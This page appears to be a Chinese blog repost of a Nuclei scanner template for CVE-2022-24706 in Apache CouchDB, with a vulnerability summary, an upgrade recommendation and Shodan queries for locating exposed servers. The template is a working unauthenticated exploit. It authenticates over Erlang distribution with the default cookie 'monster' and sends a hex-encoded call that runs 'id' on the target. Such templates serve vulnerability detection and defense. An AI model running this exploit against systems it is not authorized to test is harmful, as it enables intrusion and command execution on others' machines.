CouchDB Erlang Distribution - Remote Command Execution

漏洞信息

漏洞名称: CouchDB Erlang Distribution - Remote Command Execution

漏洞编号:

  • CVE: CVE-2022-24706

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个面向文档的数据库,使用JSON格式存储数据,并通过HTTP API进行访问。CouchDB广泛应用于各种规模的企业和个人项目中,因其易于使用和强大的同步功能而受到欢迎。

该漏洞存在于Apache CouchDB的Erlang分布式协议中,由于默认安装时未正确配置安全设置,攻击者无需认证即可访问系统并获得管理员权限。漏洞的技术根源在于默认的Erlang cookie值“monster”被使用,这使得攻击者能够绕过认证机制,执行任意命令。

此漏洞的影响极为严重,攻击者可以利用此漏洞在受影响的系统上执行任意命令,可能导致数据泄露、服务中断或进一步的系统入侵。由于漏洞允许未经授权的访问,且可以自动化利用,因此对运行受影响版本CouchDB的系统构成了重大威胁。建议用户立即升级到3.2.2或更高版本,以避免潜在的安全风险。

产品厂商: apache

产品名称: couchdb

影响版本: * < 3.2.2

搜索语法: product:”CouchDB” OR product:”couchdb” OR cpe:”cpe:2.3:a:apache:couchdb”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2022%2FCVE-2022-24706.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

id: CVE-2022-24706

info:
name: CouchDB Erlang Distribution - Remote Command Execution
author: Mzack9999,pussycat0x, NaN@korelogic
severity: critical
description: |
In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
remediation: |
Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
reference:
- https://www.exploit-db.com/exploits/50914
- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
- https://nvd.nist.gov/vuln/detail/CVE-2022-24706
- http://www.openwall.com/lists/oss-security/2022/04/26/1
- http://www.openwall.com/lists/oss-security/2022/05/09/1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24706
cwe-id: CWE-1188
epss-score: 0.94412
epss-percentile: 0.99975
cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 2
vendor: apache
product: couchdb
shodan-query:
- product:"CouchDB"
- product:"couchdb"
- cpe:"cpe:2.3:a:apache:couchdb"
tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp
variables:
name_msg: "00156e00050007499c4141414141414041414141414141"
challenge_reply: "00157201020304"
cookie: "monster"
cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"
tcp:
- host:
- "{{Hostname}}"
- "{{Host}}:{{Port}}"
inputs:
# auth
- data: "{{name_msg}}"
type: hex
read: 1024
- read: 1024
name: challenge
- data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
type: hex
# rce
- data: "{{cmd}}"
type: hex
read: 1024
matchers:
- type: word
part: raw
words:
- "uid"
- "gid"
- "groups"
condition: and
# digest: 4a0a0047304502204734da756639045be38d801b4df76f1c1c1ef05903fa15dbd8cef2295be58bdf022100c2d6efedf4a51a7a60be68b7f979be6dde7a87638113a78483ee4150a14439c0:922c64590222798bb761d5b6d8e72950


CouchDB Erlang Distribution - Remote Command Execution
http://example.com/2025/07/06/github_27877750/
作者
lianccc
发布于
2025年7月6日
许可协议